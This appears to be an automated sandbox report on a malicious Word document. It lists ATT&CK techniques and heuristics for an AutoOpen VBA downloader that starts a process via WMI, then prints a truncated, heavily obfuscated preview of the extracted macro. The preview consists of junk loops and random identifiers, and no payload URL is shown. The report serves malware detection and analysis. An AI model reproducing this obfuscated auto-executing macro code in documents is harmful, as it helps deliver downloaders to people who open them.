Verdict: MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes GetObject and CreateObject to launch a process via WMI (Win32_Process), indicating an attempt to execute a secondary payload. ClamAV also identified this file as a downloader.
Heuristics (8)
- ClamAV: Doc.Downloader.Sagent-6938008-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sagent-6938008-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38883 bytes |

SHA-256 (macros.bas): 4a51fd4282320c8a8605115f9490331b33a95afc1f422c14649b61642a2688b1
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "DDUwGA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CBAQAAQ"
Attribute VB_Base = "0{46282A81-997D-4CFC-9755-60F76D02FBCE}{EAEDC591-1CA4-45BE-960B-E278988AC6D0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "mUAAQAA"
Attribute VB_Base = "0{D5C06930-87F5-4643-92B7-A704F593397C}{272B7BC4-7759-4DBC-B6A3-3CF40F7AFCC4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "HkAG1AX"
Sub autoopen()
If XoCkUDAA = LAAACDw1 Then
Do While WBAC4kAB And oGGZAoU
While qoAQQAA And 308390607
AXUA1Q = Asc(876848353 / Oct(641485969))
Wend
For OAAQAwQ = 72674189 To 313119313
zCABcA = 33669867
Next
Set HAAZkDA = zowAAwZ
If jBoDcA Eqv 967607897 Then
vc1ABX = CDate(XAAAQAU)
End If
While pBZwBDU < vGQA_QA
tDAAAc = (YBUAUAGA)
Wend
Loop
End If
If U_DcXZQ_ = IAAABAwC Then
Do While DACX4QG_ And s4U4kD
While KXUUwDU And 319305645
AADUADA = Asc(235393707 / Oct(527725812))
Wend
For VADoCcB = 633716738 To 745494397
W4ACwDAB = 461559918
Next
Set B_ADAA = tBAAQDAA
If HGxxAA_ Eqv 952602168 Then
X1CUDU = CDate(DoBU4cQ)
End If
While SCB4QAw < zxwZ4XG
dADXUB = (UQADAwAG)
Wend
Loop
End If
l4U1kD
If NAUAQB_ = rG4G1D Then
Do While nwcBoQ And rXA1AAAk
While NACU_Q And 818106465
LQxADC = Asc(778725614 / Oct(670121892))
Wend
For hUxDAUG = 571866125 To 581875958
nZQABU = 292765752
Next
Set LxAUAAAA = zAkAZUw
If zQXwxD Eqv 469348400 Then
EAQZ4xA = CDate(RQ4oAQ)
End If
While sABAA4C < wxQ14A
rQA_QDU = (uAAkAAx)
Wend
Loop
End If
If DQADkD = c_kQDw Then
Do While XBAcDwG And UGAAxBXD
While PZQ4QA And 895886630
mBA_XQ4A = Asc(106337884 / Oct(350423822))
Wend
For sA_UU4AQ = 601251838 To 945267077
FoAGC4C = 453670911
Next
Set NAAwCUAD = qA_Q1Ak_
If EAAAAAU Eqv 928696060 Then
VwQoZAD = CDate(nkZocQB)
End If
While TAZ_U_ < uZoAGZA
iZB1BA = (zQBCXUZo)
Wend
Loop
End If
End Sub
Attribute VB_Name = "XUAA4ABA"
Function l4U1kD()
On Error Resume Next
If vAUDQU = BAQ1Ao Then
Do While cDAUw__ And oAcAAUA
While zBxZAUoA And 342594123
iAcUwAAA = Asc(210074705 / Oct(821253553))
Wend
For YcADD4cC = 615132368 To 765151774
jAx1UQAk = 896012357
Next
Set mD4A4A4A = AQQAAZU
If HAoDUoA Eqv 944372428 Then
vDCxwxxQ = CDate(qxAcDGA)
End If
While SxXAAAAB < bXXGGAAA
QxAZxA = (wUAACcB)
Wend
Loop
End If
If aAwkxX = LAXAwQA Then
Do While VAoAUA And VAZAAA
While I1BAXBGC And 800957531
CowwZAXC = Asc(214482043 / Oct(972335969))
Wend
For VQA4AU = 473269207 To 328813822
zAwUBB4A = 940025354
Next
Set jGwXZckU = lXX_Uk
If dAwBDA Eqv 174784521 Then
LDDAxQ = CDate(sBACUDAU)
End If
While tACXAD < GAB11xQ
SDwUGCAQ = (PAc4_cU1)
Wend
Loop
End If
If zUXUZAwQ = wAABAQ Then
Do While ZAQDGU And jGACQU4A
While dcB4AAA And 735536284
CAoQQUU = Asc(169594649 / Oct(4907049))
Wend
For XAAQBABU = 553118563 To 120487162
JcGZoo = 983199834
Next
Set zAUoACAA = pAAkBBB
If nAwZAAGA Eqv 109182654 Then
```

... (truncated)